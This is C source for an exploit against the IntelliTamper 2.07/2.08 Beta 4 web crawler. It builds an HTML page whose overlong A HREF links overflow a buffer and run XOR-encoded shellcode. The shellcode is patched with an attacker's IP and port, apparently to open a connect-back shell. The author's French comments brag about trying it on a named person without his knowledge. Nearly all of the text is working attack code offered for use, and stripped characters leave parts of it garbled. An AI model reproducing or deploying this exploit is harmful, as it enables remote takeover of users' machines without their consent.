IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */

/********************************************************************/

/* NO MORE */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/********************************************************************/

/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */

/* Jef_FR pourra vous le confirmer hihi :P */

/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */

/* ben y'a du SEH alors le premier lien qui est fait plus petit */

/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */

/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */

/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */

/* j'ai remarqué que sur les deux versions une fois que ca crash */

/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */

/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */

/* regardé sur d'autres plateformes, vu que j'ai deja des ret */

/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */

/* */

/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */

/* opcode du genre < > " r n ... C'est pas sorcier a coder :) */

/********************************************************************/

/* informations: www.coromputer.net, irc undernet #coromputer */

/********************************************************************/

#include

#include

#include

#ifdef _WIN32

#include

#pragma comment(lib, "ws2_32")

#else

#include

#endif

#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07

* for v2.07 it isn't this size 'cause

* there's a *missing* in RET_ADDR2

* so it cuts the size.

*/

#define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */

#define RET_POS SIZEOF-4

#define RET_ADDR 0x004368C4

#define SCOFFSET2 100 /* IntelliTamper v2.07 */

#define RET_POS2 6832

#define RET_ADDR2 0x00437224

#define u_short unsigned short

#define u_char unsigned char

#define HOP 0xd9 /* host opcode */

#define POP 0xda /* port opcode */

#define BEGIN "hirnrn"

#define END "rn"

int set_sc(char *host,unsigned long port, char *sc)

{

unsigned long ip,p;

unsigned int i;

ip=inet_addr(host)^0x98989898;

p=htons((u_short)port);

p=p<<16;

p =0x0002;

p=p^0x98989898;

for(i=0;i

if((u_char)sc[i]==HOP&&(u_char)sc[i 1]==HOP)

if((u_char)sc[i 2]==HOP&&(u_char)sc[i 3]==HOP) {

memcpy(sc i,&ip,4);

ip=0;

}

if((u_char)sc[i]==POP&&(u_char)sc[i 1]==POP)

if((u_char)sc[i 2]==POP&&(u_char)sc[i 3]==POP) {

memcpy(sc i,&p,4);

p=0;

}

}

if(ip||p) {

printf("error: unable to find ip/port sequence in shellc0den");

return -1;

}

return 0;

}

void syntax(char *prog)

{

printf("syntax: %s n",prog);

exit(0);

}

void banner(void)

{

printf("nt[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit "

"by kralor [Crpt]n");

printf("tt www.coromputer.net && undernet #coromputernn");

return;

}

int main(int argc, char *argv[])

{

char buffer[SIZEOF];

unsigned long port;

FILE *file;

char shellc0de[] = /* sizeof(shellc0de xorer) == 334 bytes */

/* classic xorer */

/* "xcc" */

"xebx02xebx05xe8xf9xffxffxffx5bx80xc3x10x33xc9x66"

"xb9x3fx01x80x33x98x43xe2xfa"

/* shellc0de */

"x19x5cx50x98x98x98x13x74x13x6cxcdxcexfcx39xa8x98"

"x98x98x13xd8x94x13xe8x84x35x13xf0x90x73x98x13x5d"

"xc6xc5x11x9ex67xaexf0x16xd6x96x74x70x35x98x98x98"

"xf0xabxaax98x98xf0xefxebxaaxc7xccx67x48x13x60xcf"

"xf0x41x91x6dx35x70x0bx98x98x98xabx51xc9xc9xc9xc9"

"xd9xc9xd9xc9x67x48x11xdexbcxcfxf0x74x61x32xf8x70"

"xe1x98x98x98xf0xd9xd9xd9xd9xf0xdaxdaxdaxdax13x54"

"xf2x88xc9x67xeexbcx67x48xf0xfbxf5xfcx98x11xfexa8"

"x67xaexf0xeax66x2bx8ex70xc9x98x98x98x11xdex86x1b"

"x74xccx15xa4xbcxabx58xabx51x1bx59x8dx33x7ax65x5e"

"xdcxbcx88xdcx66xdcxbcxa5x66xdcxbcxa4x13xdexbcx11"

"xdcxbcxd0x11xdcxbcxd4x11xdcxbcxc8x15xdcxbcx88xcc"

"xc8xc9xc9xc9xf2x99xc9xc9x67xeexa8xc9x67xcex86x67"

"xaexf0x77x56x78xf8x70x9ax98x98x98x67x48xcbxcdxce"

"xcfx13xf4xbcx80x13xddxa4x13xccx9dxe0x9bx4dx13xd2"

"x80x13xc2xb8x9bx45x7bxaaxd1x13xacx13x9bx6dxabx67"

"x64xabx58x34xa2x5cxecx9fx59x57x95x9bx60x73x6axa3"

"xe4xbcx8cxedx79x13xc2xbcx9bx45xfex13x94xd3x13xc2"

"x84x9bx45x13x9cx13x9bx5dx73x9axabx58x13x4dxc7xc6"

"xc5xc3x5ax9cx98";

banner();

if(argc!=4)

syntax(argv[0]);

port=atoi(argv[3]);

if(port<=0||port>65535) {

printf("error: must be between 1 and 65535rn");

return -1;

}

printf("[S] ip: %s port: %d file: %srn",argv[2],port,argv[1]);

printf("[C] Setting universal %-39s ...","shellcode");

if(set_sc(argv[2],port,shellc0de))

return -1;

printf("DONErn");

file=fopen(argv[1],"w");

if(!file) {

printf("error: unable to open %srn",argv[1]);

return -1;

}

printf("[C] Writing magic link for Intellitamper %-20s ...","v2.07");

fprintf(file,BEGIN);

fprintf(file,"sex drugs and rock'n'roll
rn");

memset(buffer,0x90,sizeof(buffer));

*(unsigned long*)&buffer[RET_POS2] = RET_ADDR2;

memcpy(buffer SCOFFSET2,shellc0de,sizeof(shellc0de)-1);

memcpy(buffer 6836-8,"xEBxE0",2); /* jmp $ - 0x10 */

memcpy(buffer 6836-16,"xE9x8FxE5xFFxFF",5); /* jmp $ - ??? */

fprintf(file,"

fprintf(file,buffer);

fprintf(file,"">sexy bitch
rn");

printf("DONErn");

printf("[C] Writing magic link for Intellitamper %-20s ...","v2.08 Beta 4");

memset(buffer,0x90,sizeof(buffer));

*(unsigned long*)&buffer[RET_POS] = RET_ADDR;

memcpy(buffer SCOFFSET,shellc0de,sizeof(shellc0de)-1);

memcpy(buffer SIZEOF-8,"xEBxE0",2); /* jmp $ - 0x10 */

memcpy(buffer SIZEOF-16,"xE9x8FxEBxFFxFF",5); /* jmp $ - ??? */

fprintf(file,"

fprintf(file,buffer);

fprintf(file,"">not sexy bitch
rn");

printf("DONErn");

fprintf(file,END);

fclose(file);

printf("[C] All job donern");

return 0;

}